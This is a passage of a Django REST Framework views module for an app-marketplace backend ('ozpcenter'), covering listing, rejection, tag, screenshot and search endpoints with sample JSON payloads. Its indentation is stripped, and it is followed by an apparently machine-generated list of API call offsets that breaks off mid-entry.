raise errors.RequestException('Error pending listing for deletion')
class ListingRejectionViewSet(viewsets.ModelViewSet):
"""
ModelViewSet for getting all Listing Rejections
Access Control
===============
- AppsMallSteward can view
URIs
======
POST /api/listing/{pk}/rejection
Summary:
Add a ListingRejection
Request:
data: ListingRejectionSerializer Schema
Response:
200 - Successful operation - ListingActivitySerializer
GET /api/listing/{pk}/rejection
Summary:
Find a ListingRejection Entry by ID
Response:
200 - Successful operation - ListingActivitySerializer
"""
permission_classes = (permissions.IsOrgStewardOrReadOnly,)
serializer_class = serializers.ListingActivitySerializer
def get_queryset(self):
queryset = model_access.get_rejection_listings(
self.request.user.username)
return queryset
def list(self, request, listing_pk=None):
queryset = self.get_queryset().filter(listing__id=listing_pk)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request}, many=True)
return Response(serializer.data)
def create(self, request, listing_pk=None):
try:
user = generic_model_access.get_profile(request.user.username)
listing = model_access.get_listing_by_id(request.user.username,
listing_pk)
rejection_description = request.data['description']
listing = model_access.reject_listing(user, listing,
rejection_description)
return Response(data={"listing": {"id": listing.id}},
status=status.HTTP_201_CREATED)
except Exception as e:
logger.error('Exception: {}'.format(e), extra={'request': request})
raise errors.RequestException('Error rejecting listing')
class ScreenshotViewSet(viewsets.ModelViewSet):
"""
Listing Types
ModelViewSet for getting all Screenshots for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/screenshot/
Summary:
Get a list of all system-wide Screenshot entries
Response:
200 - Successful operation - [ScreenshotSerializer]
POST /api/screenshot/
Summary:
Add a Screenshot
Request:
data: ScreenshotSerializer Schema
Response:
200 - Successful operation - ScreenshotSerializer
GET /api/screenshot/{pk}
Summary:
Find a Screenshot Entry by ID
Response:
200 - Successful operation - ScreenshotSerializer
PUT /api/screenshot/{pk}
Summary:
Update a Screenshot Entry by ID
PATCH /api/screenshot/{pk}
Summary:
Update (Partial) a Screenshot Entry by ID
DELETE /api/screenshot/{pk}
Summary:
Delete a Screenshot Entry by ID
"""
permission_classes = (permissions.IsUser,)
queryset = model_access.get_all_screenshots()
serializer_class = serializers.ScreenshotSerializer
class TagViewSet(viewsets.ModelViewSet):
"""
Listing Types
ModelViewSet for getting all Tags for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/tag/
Summary:
Get a list of all system-wide Tag entries
Response:
200 - Successful operation - [TagSerializer]
POST /api/tag/
Summary:
Add a Tag
Request:
data: TagSerializer Schema
Response:
200 - Successful operation - TagSerializer
GET /api/tag/{pk}
Summary:
Find a Tag Entry by ID
Response:
200 - Successful operation - TagSerializer
PUT /api/tag/{pk}
Summary:
Update a Tag Entry by ID
PATCH /api/tag/{pk}
Summary:
Update (Partial) a Tag Entry by ID
DELETE /api/tag/{pk}
Summary:
Delete a Tag Entry by ID
"""
permission_classes = (permissions.IsUser,)
queryset = model_access.get_all_tags()
serializer_class = serializers.TagSerializer
class ListingViewSet(viewsets.ModelViewSet):
"""
Get all listings this user can see
Listing Types
ModelViewSet for getting all Listings
Access Control
===============
- All users can view
URIs
======
GET /api/listing
Summary:
Get a list of all system-wide Listings
Response:
200 - Successful operation - [ListingSerializer]
POST /api/listing/
Summary:
Add a Listing
Request:
data: ListingSerializer Schema
Response:
200 - Successful operation - ListingSerializer
GET /api/listing/{pk}
Summary:
Find a Listing Entry by ID
Response:
200 - Successful operation - ListingSerializer
PUT /api/listing/{pk}
Summary:
Update a Listing Entry by ID
PATCH /api/listing/{pk}
Summary:
Update (Partial) a Listing Entry by ID
DELETE /api/listing/{pk}
Summary:
Delete a Listing Entry by ID
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingSerializer
filter_backends = (filters.SearchFilter, filters.OrderingFilter)
search_fields = ('title', 'id', 'owners__display_name', 'agency__title', 'agency__short_name',)
ordering_fields = ('id', 'agency__title', 'agency__short_name', 'is_enabled', 'is_featured',
'edited_date', 'security_marking', 'is_private', 'approval_status', 'approved_date',
'avg_rate', 'total_votes')
case_insensitive_ordering_fields = ('title',)
ordering = ('is_deleted', '-edited_date')
def get_queryset(self):
approval_status = self.request.query_params.get('approval_status', None)
# org = self.request.query_params.get('org', None)
orgs = self.request.query_params.getlist('org', False)
enabled = self.request.query_params.get('enabled', None)
ordering = self.request.query_params.get('ordering', None)
owners_id = self.request.query_params.get('owners_id', None)
if enabled:
enabled = enabled.lower()
if enabled in ['true', '1']:
enabled = True
else:
enabled = False
if ordering:
ordering = [s.strip() for s in ordering.split(',')]
else:
# always default to last modified for consistency
ordering = ['-edited_date']
listings = model_access.get_listings(self.request.user.username)
if owners_id:
listings = listings.filter(owners__id=owners_id)
if approval_status:
listings = listings.filter(approval_status=approval_status)
if orgs:
listings = listings.filter(agency__short_name__in=orgs)
if enabled is not None:
listings = listings.filter(is_enabled=enabled)
# have to handle this case manually because the ordering includes an app multiple times
# if there are multiple owners. We instead do sorting by case insensitive compare of the
# app owner that comes first alphabetically
param = [s for s in ordering if 'owners__display_name' == s or '-owners__display_name' == s]
if ordering is not None and param:
orderby = 'min'
if param[0].startswith('-'):
orderby = '-min'
listings = listings.annotate(min=Min(Lower('owners__display_name'))).order_by(orderby)
self.ordering = None
# Django REST filters are canse sensitive by default, so we handle case_insensitive fields
# manually. May want to abstract this functionality in an OrderingFilter sub-class
case_insensitive_ordering = [s for s in ordering if s in self.case_insensitive_ordering_fields or
s.startswith('-') and s[1:] in self.case_insensitive_ordering_fields]
if ordering is not None and case_insensitive_ordering:
for field in case_insensitive_ordering:
if field.startswith('-'):
listings = listings.order_by(Lower(field[1:])).reverse()
else:
listings = listings.order_by(Lower(field))
self.ordering = None
return listings
def list(self, request):
queryset = serializers.ListingSerializer.setup_eager_loading(self.get_queryset())
queryset = self.filter_queryset(queryset)
counts_data = model_access.put_counts_in_listings_endpoint(queryset)
# it appears that because we override the queryset here, we must
# manually invoke the pagination methods
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ListingSerializer(page,
context={'request': request}, many=True)
r = self.get_paginated_response(serializer.data)
# add counts to response
r.data['counts'] = counts_data
return r
serializer = serializers.ListingSerializer(queryset,
context={'request': request}, many=True)
r = Response(serializer.data)
# add counts to response
counts = {'counts': counts_data}
r.data.append(counts)
return r
def create(self, request):
"""
Save a new Listing - only title is required
Sample Payload:
{
"title":"My Test App",
"description":"This is the full description of my app",
"descriptionShort":"short app description",
"contacts":[
{
"type":"Technical Support",
"name":"Tech Support Contact",
"organization":"ABC Inc",
"email":"<EMAIL>",
"securePhone":"555-555-5555",
"unsecurePhone":"111-222-3454"
}
],
"tags":[
"tag1",
"tag2"
],
"type":"Web Application",
"usage_requirements":"None",
"system_requirements":"None",
"versionName":"1.0.0",
"launchUrl":"http://www.google.com/myApp",
"whatIsNew":"Nothing is new",
"owners":[
{
"username":"alan"
}
],
"agency":"Test Organization",
"categories":[
"Entertainment",
"Media and Video"
],
"intents":[
"application/json/edit",
"application/json/view"
],
"docUrls":[
{
"name":"wiki",
"url":"http://www.wikipedia.com/myApp"
}
],
"smallIconId":"b0b54993-0668-4419-98e8-787e4c3a2dc2",
"largeIconId":"e94128ab-d32d-4241-8820-bd2c69a64a87",
"bannerIconId":"ecf79771-79a0-4884-a36d-5820c79c6d72",
"featuredBannerIconId":"c3e6a369-4773-485e-b369-5cebaa331b69",
"changeLogs":[
],
"screenshots":[
{
"smallImageId":"0b8db892-b669-4e86-af23-d899cb4d4d91",
"largeImageId":"80957d25-f34b-48bc-b860-b353cfd9e101"
}
]
}
---
parameters:
- name: body
required: true
paramType: body
parameters_strategy:
form: replace
query: replace
omit_serializer: true
"""
# logger.debug('inside ListingViewSet.create', extra={'request': request})
serializer = serializers.ListingSerializer(data=request.data,
context={'request': request}, partial=True)
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def retrieve(self, request, pk=None):
"""
Get a Listing by id
"""
queryset = self.get_queryset().get(pk=pk)
serializer = serializers.ListingSerializer(queryset,
context={'request': request})
# TODO: Refactor in future to use django ordering (mlee)
temp = serializer.data.get('screenshots')
temp.sort(key=operator.itemgetter('order'))
return Response(serializer.data)
def destroy(self, request, pk=None):
"""
Delete a listing
"""
queryset = self.get_queryset()
listing = get_object_or_404(queryset, pk=pk)
description = request.data['description'] if 'description' in request.data else None
if not description:
raise errors.InvalidInput('Description is required when deleting a listing')
model_access.delete_listing(request.user.username, listing, description)
return Response(status=status.HTTP_204_NO_CONTENT)
def update(self, request, pk=None):
"""
Update a Listing
Sample payload:
{
"id":45,
"title":"My Test App",
"description":"This is the full description of my app",
"descriptionShort":"short app description",
"contacts":[
{
"securePhone":"555-555-5555",
"unsecurePhone":"111-222-3454",
"email":"<EMAIL>",
"organization":"ABC Inc",
"name":"Tech <NAME>",
"type":"Technical Support"
}
],
"totalReviews":0,
"avgRate":0,
"totalRate1":0,
"totalRate2":0,
"totalRate3":0,
"totalRate4":0,
"height":null,
"width":null,
"totalRate5":0,
"totalVotes":0,
"tags":[
"tag2",
"tag1"
],
"type":"Web Application",
"uuid":"e378c427-bba6-470c-b2f3-e550b9129504",
"usage_requirements":"None",
"system_requirements":"None",
"iframe_compatible":false,
"versionName":"1.0.0",
"launchUrl":"http://www.google.com/myApp",
"whatIsNew":"Nothing is new",
"owners":[
{
"displayName":"kevink",
"username":"kevink",
"id":5
}
],
"agency":"Test Organization",
"agencyShort":"TO",
"currentRejection":null,
"isEnabled":true,
"categories":[
"Media and Video",
"Entertainment"
],
"editedDate":"2015-08-12T10:53:47.036+0000",
"intents":[
"application/json/edit",
"application/json/view"
],
"docUrls":[
{
"url":"http://www.wikipedia.com/myApp",
"name":"wiki"
}
],
"approvalStatus":"IN_PROGRESS",
"isFeatured":false,
"smallIconId":"b0b54993-0668-4419-98e8-787e4c3a2dc2",
"largeIconId":"e94128ab-d32d-4241-8820-bd2c69a64a87",
"bannerIconId":"ecf79771-79a0-4884-a36d-5820c79c6d72",
"featuredBannerIconId":"c3e6a369-4773-485e-b369-5cebaa331b69",
"changeLogs":[
],
"screenshots":[
{
"largeImageId":"80957d25-f34b-48bc-b860-b353cfd9e101",
"smallImageId":"0b8db892-b669-4e86-af23-d899cb4d4d91"
}
]
}
"""
# logger.debug('inside ListingViewSet.update', extra={'request': request})
instance = self.get_queryset().get(pk=pk)
serializer = serializers.ListingSerializer(instance, data=request.data, context={'request': request}, partial=True)
# logger.debug('created ListingSerializer', extra={'request': request})
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
def partial_update(self, request, pk=None):
"""
TODO: Probably don't use this (PATCH)
"""
pass
class ListingUserViewSet(viewsets.ModelViewSet):
"""
Listing Types
Get all listings owned by this user
ModelViewSet for getting all ListingUserViewSets
Access Control
===============
- All users can view
URIs
======
GET /api/self/listing
Summary:
Get a list of all system-wide Listing User entries
Response:
200 - Successful operation - [ListingSerializer]
GET /api/self/listing/{pk}
Summary:
Find a ListingUserViewSet Entry by ID
Response:
200 - Successful operation - ListingSerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingSerializer
def get_queryset(self):
return model_access.get_self_listings(self.request.user.username)
def list(self, request):
return super(ListingUserViewSet, self).list(self, request)
class ListingSearchViewSet(viewsets.ModelViewSet):
"""
Search for listings
ModelViewSet for getting all Listing Searches
Access Control
===============
- All users can view
URIs
======
GET /api/listings/search
Summary:
Get a list of all system-wide Listing Search entries
Response:
200 - Successful operation - [ListingSerializer]
GET /api/listings/search/{pk}
Summary:
Find a ListingSearchViewSet Entry by ID
Response:
200 - Successful operation - ListingSerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingSerializer
filter_backends = (filters.SearchFilter, )
search_fields = ('title', 'description', 'description_short', 'tags__name')
def get_queryset(self):
filter_params = {}
categories = self.request.query_params.getlist('category', False)
agencies = self.request.query_params.getlist('agency', False)
listing_types = self.request.query_params.getlist('type', False)
if categories:
filter_params['categories'] = categories
if agencies:
filter_params['agencies'] = agencies
if listing_types:
filter_params['listing_types'] = listing_types
return model_access.filter_listings(self.request.user.username,
filter_params)
def list(self, request):
"""
---
# YAML (must be separated by `---`)
omit_serializer: false
parameters:
- name: search
description: Text to search
paramType: query
- name: category
description: List of category names (AND logic)
required: false
paramType: query
allowMultiple: true
- name: agency
description: List of agencies
paramType: query
- name: type
description: List of application types
paramType: query
- name: limit
description: Max number of listings to retrieve
paramType: query
- name: offset
description: Offset
paramType: query
responseMessages:
- code: 401
message: Not authenticated
"""
return super(ListingSearchViewSet, self).list(self, request)
class ElasticsearchListingSearchViewSet(viewsets.ViewSet):
"""
Elasticsearch Listing Search Viewset
It must support pagination. offset, limit
GET /api/listings/essearch/?search=6&offset=0&limit=24 HTTP/1.1
GET /api/listings/essearch/?search=6&offset=0&limit=24 HTTP/1.1
GET api/listings/essearch/?search=6&offset=0&category=Education&limit=24&type=web+application&agency=Minitrue&agency=Miniluv&minscore=0.4
ModelViewSet for searching all Listings with Elasticsearch
Access Control
===============
- All users can view
URIs
======
GET /api/listings/essearch
"""
permission_classes = (permissions.IsUser,)
def list(self, request):
current_request_username = request.user.username
params_obj = model_access_es.SearchParamParser(request)
results = model_access_es.search(current_request_username, params_obj)
return Response(results, status=status.HTTP_200_OK)
@list_route(methods=['get'], permission_classes=[permissions.IsUser])
def suggest(self, request):
current_request_username = request.user.username
params_obj = model_access_es.SearchParamParser(self.request)
results = model_access_es.suggest(current_request_username, params_obj)
return Response(results, status=status.HTTP_200_OK)
def create(self, request):
"""
This method is not supported
"""
raise errors.NotImplemented('HTTP Verb Not Supported')
def retrieve(self, request, pk=None):
"""
This method is not supported
"""
raise errors.NotImplemented('HTTP Verb Not Supported')
def update(self, request, pk=None):
"""
This method is not supported
"""
raise errors.NotImplemented('HTTP Verb Not Supported')
def partial_update(self, request, pk=None):
"""
This method is not supported
"""
raise errors.NotImplemented('HTTP Verb Not Supported')
def destroy(self, request, pk=None):
"""
This method is not supported
"""
raise errors.NotImplemented('HTTP Verb Not Supported')
| [
"ozpcenter.api.listing.model_access.put_counts_in_listings_endpoint",
"ozpcenter.api.listing.model_access.get_listing_by_id",
"ozpcenter.api.listing.model_access.get_all_listing_activities",
"ozpcenter.pipe.pipes.ListingDictPostSecurityMarkingCheckPipe",
"ozpcenter.api.listing.serializers.RecommendationFeed... | [((1026, 1057), 'ozpcenter.api.listing.model_access.get_all_doc_urls', 'model_access.get_all_doc_urls', ([], {}), '()\n', (1055, 1057), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((11090, 11126), 'ozpcenter.api.listing.model_access.get_all_listing_types', 'model_access.get_all_listing_types', ([], {}), '()\n', (11124, 11126), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((20774, 20808), 'ozpcenter.api.listing.model_access.get_all_screenshots', 'model_access.get_all_screenshots', ([], {}), '()\n', (20806, 20808), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((21816, 21843), 'ozpcenter.api.listing.model_access.get_all_tags', 'model_access.get_all_tags', ([], {}), '()\n', (21841, 21843), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((38587, 38655), 'rest_framework.decorators.list_route', 'list_route', ([], {'methods': "['get']", 'permission_classes': '[permissions.IsUser]'}), "(methods=['get'], permission_classes=[permissions.IsUser])\n", (38597, 38655), False, 'from rest_framework.decorators import list_route\n'), ((2279, 2331), 'ozpcenter.api.listing.model_access.get_reviews', 'model_access.get_reviews', (['self.request.user.username'], {}), '(self.request.user.username)\n', (2303, 2331), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((2908, 2987), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['queryset'], {'many': '(True)', 'context': "{'request': request}"}), "(queryset, many=True, context={'request': request})\n", (2936, 2987), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((3003, 3028), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (3011, 3028), False, 'from rest_framework.response import Response\n'), ((3180, 3248), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['queryset'], {'context': "{'request': request}"}), "(queryset, context={'request': request})\n", (3208, 3248), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((3264, 3289), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (3272, 3289), False, 'from rest_framework.response import Response\n'), ((3409, 3480), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (3439, 3480), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((3503, 3618), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', ([], {'data': 'request.data', 'context': "{'request': request, 'listing': listing}", 'partial': '(True)'}), "(data=request.data, context={'request': request,\n 'listing': listing}, partial=True)\n", (3531, 3618), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((3861, 3918), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (3869, 3918), False, 'from rest_framework.response import Response\n'), ((4053, 4124), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (4083, 4124), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((4142, 4175), 'ozpcenter.api.listing.model_access.get_review_by_id', 'model_access.get_review_by_id', (['pk'], {}), '(pk)\n', (4171, 4175), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((4198, 4321), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['review'], {'data': 'request.data', 'context': "{'request': request, 'listing': listing}", 'partial': '(True)'}), "(review, data=request.data, context={'request':\n request, 'listing': listing}, partial=True)\n", (4226, 4321), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((4564, 4616), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_200_OK'}), '(serializer.data, status=status.HTTP_200_OK)\n', (4572, 4616), False, 'from rest_framework.response import Response\n'), ((4732, 4766), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['queryset'], {'pk': 'pk'}), '(queryset, pk=pk)\n', (4749, 4766), False, 'from django.shortcuts import get_object_or_404\n'), ((4775, 4840), 'ozpcenter.api.listing.model_access.delete_listing_review', 'model_access.delete_listing_review', (['request.user.username', 'review'], {}), '(request.user.username, review)\n', (4809, 4840), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((4856, 4899), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (4864, 4899), False, 'from rest_framework.response import Response\n'), ((6198, 6271), 'ozpcenter.api.listing.model_access.get_similar_listings', 'model_access.get_similar_listings', (['self.request.user.username', 'listing_pk'], {}), '(self.request.user.username, listing_pk)\n', (6231, 6271), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((7330, 7415), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request}, many=True\n )\n", (7359, 7415), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((7712, 7738), 'rest_framework.response.Response', 'Response', (['similar_listings'], {}), '(similar_listings)\n', (7720, 7738), False, 'from rest_framework.response import Response\n'), ((8352, 8429), 'ozpcenter.api.listing.model_access.get_recommendation_feedback', 'model_access.get_recommendation_feedback', (['self.request.user.username', 'listing'], {}), '(self.request.user.username, listing)\n', (8392, 8429), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((8540, 8611), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (8570, 8611), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((8786, 8894), 'ozpcenter.api.listing.serializers.RecommendationFeedbackSerializer', 'serializers.RecommendationFeedbackSerializer', (['queryset'], {'context': "{'request': request, 'listing': listing}"}), "(queryset, context={'request':\n request, 'listing': listing})\n", (8830, 8894), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((8937, 8951), 'rest_framework.response.Response', 'Response', (['data'], {}), '(data)\n', (8945, 8951), False, 'from rest_framework.response import Response\n'), ((9019, 9090), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (9049, 9090), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9113, 9231), 'ozpcenter.api.listing.serializers.RecommendationFeedbackSerializer', 'serializers.RecommendationFeedbackSerializer', ([], {'data': 'request.data', 'context': "{'request': request, 'listing': listing}"}), "(data=request.data, context={\n 'request': request, 'listing': listing})\n", (9157, 9231), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((9475, 9532), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (9483, 9532), False, 'from rest_framework.response import Response\n'), ((9610, 9681), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (9640, 9681), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9701, 9773), 'ozpcenter.api.listing.model_access.get_recommendation_feedback', 'model_access.get_recommendation_feedback', (['request.user.username', 'listing'], {}), '(request.user.username, listing)\n', (9741, 9773), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9875, 9937), 'ozpcenter.api.listing.model_access.delete_recommendation_feedback', 'model_access.delete_recommendation_feedback', (['listing', 'feedback'], {}), '(listing, feedback)\n', (9918, 9937), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9953, 9996), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (9961, 9996), False, 'from rest_framework.response import Response\n'), ((12012, 12084), 'ozpcenter.api.listing.model_access.get_listing_activities_for_user', 'model_access.get_listing_activities_for_user', (['self.request.user.username'], {}), '(self.request.user.username)\n', (12056, 12084), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((12455, 12548), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (12492, 12548), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((12571, 12596), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (12579, 12596), False, 'from rest_framework.response import Response\n'), ((13987, 14080), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (14024, 14080), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((14103, 14128), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (14111, 14128), False, 'from rest_framework.response import Response\n'), ((15355, 15448), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (15392, 15448), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((15471, 15496), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (15479, 15496), False, 'from rest_framework.response import Response\n'), ((15648, 15725), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}"}), "(queryset, context={'request': request})\n", (15685, 15725), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((15753, 15778), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (15761, 15778), False, 'from rest_framework.response import Response\n'), ((16579, 16649), 'ozpcenter.api.listing.model_access.get_pending_deletion_listings', 'model_access.get_pending_deletion_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (16621, 16649), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((16825, 16918), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (16862, 16918), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((16941, 16966), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (16949, 16966), False, 'from rest_framework.response import Response\n'), ((18613, 18676), 'ozpcenter.api.listing.model_access.get_rejection_listings', 'model_access.get_rejection_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (18648, 18676), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((18852, 18945), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (18889, 18945), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((18968, 18993), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (18976, 18993), False, 'from rest_framework.response import Response\n'), ((24290, 24343), 'ozpcenter.api.listing.model_access.get_listings', 'model_access.get_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (24315, 24343), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((26299, 26353), 'ozpcenter.api.listing.model_access.put_counts_in_listings_endpoint', 'model_access.put_counts_in_listings_endpoint', (['queryset'], {}), '(queryset)\n', (26343, 26353), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((26855, 26940), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request}, many=True\n )\n", (26884, 26940), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((26960, 26985), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (26968, 26985), False, 'from rest_framework.response import Response\n'), ((29454, 29550), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', ([], {'data': 'request.data', 'context': "{'request': request}", 'partial': '(True)'}), "(data=request.data, context={'request':\n request}, partial=True)\n", (29483, 29550), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((29807, 29864), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (29815, 29864), False, 'from rest_framework.response import Response\n'), ((30031, 30100), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['queryset'], {'context': "{'request': request}"}), "(queryset, context={'request': request})\n", (30060, 30100), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((30295, 30320), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (30303, 30320), False, 'from rest_framework.response import Response\n'), ((30469, 30503), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['queryset'], {'pk': 'pk'}), '(queryset, pk=pk)\n', (30486, 30503), False, 'from django.shortcuts import get_object_or_404\n'), ((30723, 30795), 'ozpcenter.api.listing.model_access.delete_listing', 'model_access.delete_listing', (['request.user.username', 'listing', 'description'], {}), '(request.user.username, listing, description)\n', (30750, 30795), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((30811, 30854), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (30819, 30854), False, 'from rest_framework.response import Response\n'), ((33673, 33780), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['instance'], {'data': 'request.data', 'context': "{'request': request}", 'partial': '(True)'}), "(instance, data=request.data, context={\n 'request': request}, partial=True)\n", (33702, 33780), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((34104, 34156), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_200_OK'}), '(serializer.data, status=status.HTTP_200_OK)\n', (34112, 34156), False, 'from rest_framework.response import Response\n'), ((35028, 35086), 'ozpcenter.api.listing.model_access.get_self_listings', 'model_access.get_self_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (35058, 35086), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((36501, 36572), 'ozpcenter.api.listing.model_access.filter_listings', 'model_access.filter_listings', (['self.request.user.username', 'filter_params'], {}), '(self.request.user.username, filter_params)\n', (36529, 36572), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((38398, 38440), 'ozpcenter.api.listing.model_access_es.SearchParamParser', 'model_access_es.SearchParamParser', (['request'], {}), '(request)\n', (38431, 38440), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38460, 38520), 'ozpcenter.api.listing.model_access_es.search', 'model_access_es.search', (['current_request_username', 'params_obj'], {}), '(current_request_username, params_obj)\n', (38482, 38520), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38536, 38580), 'rest_framework.response.Response', 'Response', (['results'], {'status': 'status.HTTP_200_OK'}), '(results, status=status.HTTP_200_OK)\n', (38544, 38580), False, 'from 